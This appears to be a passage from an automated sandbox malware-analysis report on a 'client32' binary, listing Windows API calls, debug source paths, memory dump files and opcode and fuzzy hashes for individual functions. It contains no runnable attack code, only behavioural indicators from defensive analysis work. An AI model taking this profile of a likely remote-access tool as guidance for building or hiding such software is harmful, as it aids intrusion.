                                                                                • SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201
                                                                                • m_hWnd, xrefs: 11017206
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                • API String ID: 819365019-3966830984
                                                                                • Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                • Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
                                                                                • Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                • Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694
                                                                                APIs
                                                                                • ShowWindow.USER32(?,?), ref: 1100114B
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • m_hWnd, xrefs: 11001136
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 1604732272-2830328467
                                                                                • Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                • Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
                                                                                • Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                • Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4
APIs
• KillTimer.USER32(?,?), ref: 1100102B
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
• m_hWnd, xrefs: 11001016
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
Similarity
• API ID: ErrorExitKillLastMessageProcessTimerwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 2229609774-2830328467
• Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
• Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
• Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390
APIs
• GetVersion.KERNEL32(1100D85E,?,00000000,?,1100CB7A,?), ref: 1100D5E9
• LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CB7A,?), ref: 1100D5F8
Strings
Similarity
• API ID: LibraryLoadVersion
• String ID: AudioCapture.dll
• API String ID: 3209957514-2642820777
• Opcode ID: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
• Instruction ID: 371e9eeab2a9ec736c68531bc0ba6d51211132de28c640fd63a90ee5c1cea0f0
• Instruction Fuzzy Hash: BEE0173CA411678BFB028BF98C4839D7AE0A70468DFC400B0E83AC2948FB698440CF20
APIs
• FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111316A
• SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11113180
Strings
Similarity
• API ID: FindMessageSendWindow
• String ID: MSOfficeWClass
• API String ID: 1741975844-970895155
• Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
• Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
• Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC
APIs
• DestroyWindow.USER32(?,000000A8,110AC717), ref: 1115F338
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Similarity
• API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
• String ID: ..\ctl32\wndclass.cpp$m_hWnd
• API String ID: 1417657345-2201682149
• Opcode ID: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
• Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
• Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681
APIs
• GetMenu.USER32(00000000), ref: 1101D3B4
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
• m_hWnd, xrefs: 1101D3A3
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
Similarity
• API ID: ErrorExitLastMenuMessageProcesswsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 1590435379-2830328467
• Opcode ID: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
• Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
• Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384
APIs
Strings
Similarity
• API ID: MenuProp
• String ID: OldMenu
• API String ID: 601939786-3235417843
• Opcode ID: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
• Instruction ID: 00d1d82ffe912eb1f0033c226aa13db8fbf5a9b0d38ca05e3ef3a03686f26a50
• Instruction Fuzzy Hash: CBC0123214257DA782016A95DD44DCBFB6DEE0A1557044022F520D2401E721551047E9
APIs
• EnterCriticalSection.KERNEL32(111EDE2C,00000000,?,?,1100C26B,00000000,00000000), ref: 1100D8BF
• LeaveCriticalSection.KERNEL32(111EDE2C,?,?,1100C26B,00000000,00000000), ref: 1100D930
  • Part of subcall function 1100D820: EnterCriticalSection.KERNEL32(111EDE2C,1100CB7A,?,1100B5DC,?,00000000,?,1100CB7A,?), ref: 1100D829
  • Part of subcall function 1100D820: LeaveCriticalSection.KERNEL32(111EDE2C,1100B5DC,?,00000000,?,1100CB7A,?), ref: 1100D8A1
• LeaveCriticalSection.KERNEL32(111EDE2C), ref: 1100D8FF
• LeaveCriticalSection.KERNEL32(111EDE2C), ref: 1100D91B
  • Part of subcall function 1100D7D0: EnterCriticalSection.KERNEL32(111EDE2C,1100C4FB), ref: 1100D7D5
  • Part of subcall function 1100D7D0: LeaveCriticalSection.KERNEL32(111EDE2C), ref: 1100D80F
Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$Enter
                                                                                • String ID:
                                                                                • API String ID: 2978645861-0
                                                                                • Opcode ID: 10c14cb9c45534fd9ad9362a8b8fd8fef3d09697d59f75ad4657c47dcd1b45a9
                                                                                • Instruction ID: 024bf54fe56583fc36b1911af5d7f6a9c338d46169c8d4f8be6289797e831c79
                                                                                • Opcode Fuzzy Hash: 10c14cb9c45534fd9ad9362a8b8fd8fef3d09697d59f75ad4657c47dcd1b45a9
                                                                                • Instruction Fuzzy Hash: 52018835E0113C6BEB00DBE9ED4D5ADB7A9EB04B9AB4001A6FD18D3A04E631AD0087E1